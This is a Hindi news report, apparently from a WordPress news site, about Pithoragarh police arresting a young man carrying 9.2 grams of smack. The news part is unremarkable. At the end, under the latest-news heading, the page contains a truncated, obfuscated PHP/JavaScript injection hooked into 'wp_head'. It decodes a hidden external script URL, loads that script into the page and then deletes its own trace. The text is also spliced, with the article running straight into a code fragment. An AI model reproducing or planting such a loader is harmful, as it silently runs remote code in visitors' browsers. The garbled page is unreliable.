Saturday, July 27, 2024
spot_img

पिथौरागढ़ : 9.2 ग्राम स्मैक के साथ 1 युवक गिरफ्तार

पिथौरागढ़:::- पुलिस मीडिया सैल से प्राप्त सूचना के अनुसार वर्ष 2025 तक नशा मुक्त देवभूमि के मिशन को साकार करने के उद्देश्य से पुलिस अधीक्षक पिथौरागढ़ लोकेश्वर सिंह के आदेशानुसार, पुलिस उपाधीक्षक ऑपरेशन, परवेज अली के पर्यवेक्षण में जनपद पुलिस द्वारा चरस, स्मैक व अन्य नशीले पदार्थों की तस्करी,बिक्री करने वालों पर लगातार सतर्क दृष्टि रखते हुए कड़ी वैधानिक कार्रवाई की जा रही है।

जिस क्रम में एसओजी एवं कोतवाली पिथौरागढ़ पुलिस टीम द्वारा मुखबिर की सूचना पर ऐंचोली चौकी के पास संयुक्त रुप से चैकिंग के दौरान घाट की तरफ से आ रही वैगन आर कार संख्या- यूके05टीए 3902 को रोककर चैक किया गया, जिसमें कार की पिछली सीट पर बैठे व्यक्ति के संदिग्ध प्रतीत होने पर उसका नाम-पता पूछा गया उक्त व्यक्ति ने अपना नाम दीपक बिष्ट उम्र- 25 वर्ष बताया। पुलिस टीम द्वारा उक्त व्यक्ति की तलाशी ली गई तो उसके पास स्मैक बरामद हुई। बरामद स्मैक को इलेक्ट्रानिक तराजू में तोलने पर इसका वजन 9.2 ग्राम निकला।


पुलिस टीम द्वारा उक्त व्यक्ति को गिरफ्तार कर उसके विरूद्ध कोतवाली पिथौरागढ़ में धारा- 8/21 एनडीपीएस एक्ट के अन्तर्गत अभियोग पंजीकृत किया गया। वाहन चालक व वाहन में बैठी अन्य सवारियों की तलाशी लेने पर कोई भी अवैध वस्तु बरामद नहीं हुई। अभियुक्त से नशे के सौदागरों के सम्बन्ध में विस्तृत पूछताछ की जा रही है।


पुलिस टीम में उ.नि हीरा सिंह डांगी,उ.नि हेम चन्द्र तिवारी प्रभारी एसओजी, का.सोनू कार्की एसओजी, का. गोविन्द रौतेला एसओजी, का.अशोक बुदियाल एसओजी, का. कुलदीप सिंह ,का. शेर सिंह,का. होशियार सिंह, हे.कानि कुन्दन सिंह शामिल रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>